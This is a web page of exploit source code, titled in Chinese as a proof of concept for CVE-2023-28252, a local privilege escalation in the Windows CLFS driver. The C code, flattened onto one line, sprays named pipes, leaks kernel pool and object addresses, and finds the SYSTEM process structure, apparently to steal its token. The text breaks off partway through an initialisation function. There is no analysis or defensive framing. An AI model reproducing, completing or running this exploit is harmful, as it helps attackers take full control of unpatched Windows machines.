CVE-2023-28252 CLFS Windows 本地提权漏洞 POCC 源码

#include "clfs_eop.h" // Global Variables IO_STATUS_BLOCK status_block = { 0 }; UINT64 offset_SeSetAccess = 0; UINT64 offset_RtlClearBit = 0; UINT64 offset_PoFxProcessorNotification=0; UINT64 offset_SeSetAccessStateGenericMapping = 0; UINT64 offset_FsRtlCurrentBatchOplock = 0; func3* _NtFsControlFile; UINT64 fnSeSetAccessStateGenericMapping = 0; UINT64 fnPoFxProcessorNotification = 0; UINT64 offset_ClfsEarlier = 0; UINT64 offset_ClfsMgmtDeregisterManagedClient = 0; UINT64 fnClfsEarlierLsn = 0; UINT64 fnClfsMgmtDeregisterManagedClient = 0; UINT64 fnRtlClearBit = 0; UINT64 fnFsRtlCurrentBatchOplock = 0; UINT64 para_PipeAttributeobjInkernel = 0; CHAR clfs_path[] = { "\\SystemRoot\\System32\\drivers\\CLFS.SYS" }; FARPROC user_ClfsEarlierLsn = NULL; FARPROC user_ClfsMgmtDeregisterManagedClient = NULL; FARPROC user_RtlClearBit = NULL; FARPROC user_SeSetAccessStateGenericMapping = NULL; FARPROC user_PoFxProcessorNotification = NULL; UINT64 ntos_kernelBase = NULL; UINT64 clfs_kernelBase = NULL; WCHAR* stored_env_xfname = { 0 }; WCHAR* stored_env_containerfname = { 0 }; WCHAR* stored_env_filename = { 0 }; VOID* temp_chunk = 0; HANDLE logFile = INVALID_HANDLE_VALUE; HANDLE logFile2 = INVALID_HANDLE_VALUE; HANDLE filehandle = INVALID_HANDLE_VALUE; HANDLE hPipeRead = 0 ; HANDLE hPipeWrite = 0; UINT64 System_token_value = 0; UINT64 System_token_value2 = 0; size_t numread; #define NUMELEM 0x7a00 #define NUMELEM2 0x400 char buff[0x7a00]; char buff2[0x400]; char buff1[0x400]; char buff3[0x7a00]; char buff4[0x10000]; INT64 consec_number = 0; INT64 distance = 0; INT64 prev_pointer = 0; INT64 temp_pointer = 0; INT64 temp_distance = 0; INT64 final_distance = 0; UINT num_of_CLFS = 0; PUINT p_num_of_CLFS = &num_of_CLFS; // number of CLFS tags CHAR tag[] = { "Clfs" }; PUINT64 p_possible_kernelAddrArray = 0; // Offset of last field virtual address DWORD* temp_alloc_2 = 0; unsigned int amount_of_CLFS_pools = 0; // stores the amount of bigpool clfs tags WCHAR* stored_name_CreateLog; DWORD _pid = 0; DWORD pid_to_find = 0; int token_offset = 0; LONGLONG token_value = 0; WCHAR* stored_name_fopen; WCHAR* foldr = nullptr; DWORDLONG system_EPROCESS = 0; DWORDLONG system_EPROCESS_low = 0; DWORDLONG system_EPROCESS_high = 0; PUINT64 kernelAddrArray = 0; HANDLE hProcess = NULL; HANDLE hThread = NULL; HANDLE hToken = NULL; HMODULE user32 = NULL; int flag = 0; int flag2 = 0; UINT64 dest2 = 0; UINT64 dest3 = 0; UINT64 value2 = 0; UINT64* value3 = 0; UINT64 next_token; HMODULE ntbase = 0; UINT PIPE_ATTR_TAG = 0x7441704E; // NpAt ULONG retlen2 = 0; int random_part = 0; int random_part2 = 0; UINT64 CLFS_kernelAddrArray = 0; HANDLE hlogfile = INVALID_HANDLE_VALUE; FILE* pfile = 0; FILE* pfile2 = 0; WCHAR* stored_env_log = { 0 }; WCHAR* stored_env = { 0 }; WCHAR* stored_env_spray = { 0 }; WCHAR* stored_env_spray_log; WCHAR* stored_log_arrays[10] = { 0 }; WCHAR* stored_container_arrays[10] = { 0 }; WCHAR* stored_fopen_arrays[10] = { 0 }; WCHAR* tmp_env8 = { 0 }; VOID * buffer_0x1a0 = { 0 }; UINT64 * handles_buffer1 = { 0 }; UINT64* handles_buffer2 = { 0 }; VOID* dest; unsigned int pos_token = 0; void fun_pipeSpray(int value, UINT64* temp_buffer) { int contador = 0; if (value > 0) { int index = 0; do { if (!(unsigned int)CreatePipe((PHANDLE)&temp_buffer[index], (PHANDLE)&temp_buffer[index + 1], 0, 0x25c0)) { if (contador > 0) { do { CloseHandle((HANDLE)*temp_buffer); CloseHandle((HANDLE)temp_buffer[1]); temp_buffer += 2; --contador; } while (contador); } exit(1); } contador = contador + 1; index += 2; } while (contador < value); } printf("\nnumber of pipes created =%x\n", contador); return; } void getVirtualAddress() { ntbase = LoadLibraryA("ntdll.dll"); if (!ntbase) { printf("[!] LoadLibrary failed with error %x\n", (unsigned int)GetLastError()); exit(1); } fnNtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(ntbase, "NtQuerySystemInformation"); _NtFsControlFile = (func3*)GetProcAddress(ntbase, "NtFsControlFile"); if (!_NtFsControlFile) exit(1); printf("\nVIRTUAL ADDRESSES AND OFFSETS\n"); printf("[+] NtFsControlFile Address --> %p\n", _NtFsControlFile); if (!CreatePipe(&hPipeRead, &hPipeWrite, 0, 0x1000)) { exit(0); } temp_chunk = malloc(0x2000); if (temp_chunk == 0) { exit(0); } memset((UINT64*)temp_chunk + 1, 0x41, 0xffe); *(UINT64*)temp_chunk = 0x5a; // "Z" dest = malloc(0x100); if (dest == 0) { exit(0); } memset(dest, 0x42, 0xff); temp_alloc_2 = (DWORD*)VirtualAlloc(0, 0x1000, 0x1000, 4); _NtFsControlFile(hPipeWrite, 0, 0, 0, &status_block, 0x11003c, temp_chunk, 0xfd8, dest, 0x100); fnNtQuerySystemInformation(SystemBigPoolInformation, temp_alloc_2, 0x1000, &retlen2); DWORD* v5a = (DWORD*)VirtualAlloc(0, (SIZE_T)retlen2, 0x1000, 4); NTSTATUS status = STATUS_SUCCESS; if (NT_SUCCESS(status = fnNtQuerySystemInformation(SystemBigPoolInformation, v5a, retlen2, &retlen2))) { PSYSTEM_BIGPOOL_INFORMATION pBuf = (PSYSTEM_BIGPOOL_INFORMATION)(v5a); if (pBuf == 0) { exit(0); } for (ULONG i = 0; i < pBuf->Count; i++) { __try { if (pBuf->AllocatedInfo[i].TagUlong == PIPE_ATTR_TAG) { printf("[+] pool NpAt VirtualAddress -->%p\n", pBuf->AllocatedInfo[i].VirtualAddress); para_PipeAttributeobjInkernel = (UINT64)pBuf->AllocatedInfo[i].VirtualAddress; break; } } __except (EXCEPTION_EXECUTE_HANDLER) { printf("(%s) Access Violation was raised.", __FUNCTION__); } } } return; } SIZE_T GetObjectKernelAddress(HANDLE Object) { PSYSTEM_HANDLE_INFORMATION_EX handleInfo = NULL; ULONG handleInfoSize = 0x1000; ULONG retLength; NTSTATUS status; SIZE_T kernelAddress = 0; BOOL bFind = FALSE; while (TRUE) { handleInfo = (PSYSTEM_HANDLE_INFORMATION_EX)LocalAlloc(LPTR, handleInfoSize); status = fnNtQuerySystemInformation(SystemExtendedHandleInformation, handleInfo, handleInfoSize, &retLength); if (status == 0xC0000004 || NT_SUCCESS(status)) // STATUS_INFO_LENGTH_MISMATCH { LocalFree(handleInfo); handleInfoSize = retLength + 0x100; handleInfo = (PSYSTEM_HANDLE_INFORMATION_EX)LocalAlloc(LPTR, handleInfoSize); status = fnNtQuerySystemInformation(SystemExtendedHandleInformation, handleInfo, handleInfoSize, &retLength); if (!handleInfo) { printf("[!] cannot read handle info %x\n", (unsigned int)GetLastError()); exit(1); } ULONG numHandles = (ULONG)handleInfo->NumberOfHandles; if (!numHandles) { printf("[!] cannot read number of handles %x\n", (unsigned int)GetLastError()); exit(1); } if (NT_SUCCESS(status)) { for (ULONG i = 0; i < numHandles; i++) { if ((DWORD64)Object == 0x4) { if (0x4 == (DWORD)handleInfo->Handles[i].UniqueProcessId && (SIZE_T)Object == (SIZE_T)handleInfo->Handles[i].HandleValue) { kernelAddress = (SIZE_T)handleInfo->Handles[i].Object; bFind = TRUE; break; } } else { if (GetCurrentProcessId() == (DWORD)handleInfo->Handles[i].UniqueProcessId && (SIZE_T)Object == (SIZE_T)handleInfo->Handles[i].HandleValue) { kernelAddress = (SIZE_T)handleInfo->Handles[i].Object; bFind = TRUE; break; } } } } } if (handleInfo) LocalFree(handleInfo); if (bFind) break; } return kernelAddress; } VOID InitEnvironment() { DuplicateHandle(GetCurrentProcess(), GetCurrentProcess(), GetCurrentProcess(), &hProcess, 0, FALSE, DUPLICATE_SAME_ACCESS); g_EProcessAddress = GetObjectKernelAddress(hProcess); printf("[+] MY EPROCESSS %p\n", (void*)g_EProcessAddress); system_EPROCESS = GetObjectKernelAddress((HANDLE)4); printf("[+] SYSTEM EPROCESSS %p\n", (void*)system_EPROCESS); DuplicateHandle(GetCurrentProcess(), GetCurrentThread(), GetCurrentProcess(), &hThread, 0, FALSE, DUPLICATE_SAME_ACCESS); g_EThreadAddress = GetObjectKernelAddress(hThread); printf("[+] _ETHREAD ADDRESS %p\n", (void*)g_EThreadAddress);